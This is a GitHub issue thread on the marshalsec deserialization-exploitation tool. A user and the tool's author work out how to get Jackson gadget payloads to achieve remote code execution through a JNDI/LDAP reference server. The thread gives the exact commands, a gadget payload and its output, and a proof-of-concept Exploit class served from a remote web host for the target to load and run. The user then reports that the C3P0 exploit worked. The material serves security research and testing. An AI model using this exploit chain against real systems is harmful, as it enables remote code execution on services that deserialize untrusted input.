Unclear instructions for LDAP

jasinner commented 7 years ago

Nice work @mbechler, thank you! I was trying to get the Jackson exploit to work with an LDAP remote codebase. I see you have an example LDAPServer which we can use, but I'm not sure what to use as the argument when starting to make the Jackson Marshal work. Can you give more details for that? Here's what I tried: Terminal 1: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer file://marshalsec.gadgets#JdbcRowSet Output: Listening on 0.0.0.0:1389

Terminal 2:

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.Jackson -v -t SpringAbstractBeanFactoryPointcutAdvisor ldap://localhost:1389

Output:

["java.util.HashSet",[["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{"beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://localhost:1389"]}],"adviceBeanName":"ldap://localhost:1389"}],["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{}]]]

Running gadget SpringAbstractBeanFactoryPointcutAdvisor:
Failed to achieve RCE:Did not trigger RCE
org.springframework.beans.factory.BeanNotOfRequiredTypeException: Bean named 'ldap://localhost:1389' is expected to be of type 'org.aopalliance.aop.Advice' but was actually of type 'com.sun.jndi.ldap.LdapCtx'
    at org.springframework.jndi.support.SimpleJndiBeanFactory.getBean(SimpleJndiBeanFactory.java:122)
...
com.fasterxml.jackson.databind.deser.impl.TypeWrappedDeserializer.deserialize(TypeWrappedDeserializer.java:63)
    at com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:3789)
    at com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:2833)
    at marshalsec.Jackson.unmarshal(Jackson.java:78)
    at marshalsec.Jackson.unmarshal(Jackson.java:53)
    at marshalsec.MarshallerBase.test(MarshallerBase.java:238)
    at marshalsec.MarshallerBase.doRun(MarshallerBase.java:188)
    at marshalsec.MarshallerBase.run(MarshallerBase.java:121)
    at marshalsec.Jackson.main(Jackson.java:262)

mbechler commented 7 years ago

The flow essentially is:

Target unmarshalls payload, makes JNDI/LDAP lookup to the LDAPRefServer
LDAPRefServer returns a reference pointing to a URL classpath (the webserver)
Target loads class from the remote classpath and executes attacker provided code

You'll also need a webserver running somewhere hosting the code you ultimately want to execute.

E.g. Exploit.java

public class Exploit {

    static {
        System.err.println("Pwned");
        try {
            // trigger an access check so that the test sees this has been executed
            String user = System.getProperty("user.name");
        } catch ( Exception e ) {
        }
    }
}

compile that javac Exploit.java and put it on that webserver. Let's say that it is now accessible (from the exploitation target) as http://192.0.2.1/foo/Exploit.class then you would run the LDAPRefServer as

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.0.2.1/foo/#Exploit

Hope that clears it up.

jasinner commented 7 years ago

Great, Thanks. I got the C3P0 exploit to work with this setup.

mbechler / marshalsec

Unclear instructions for LDAP #1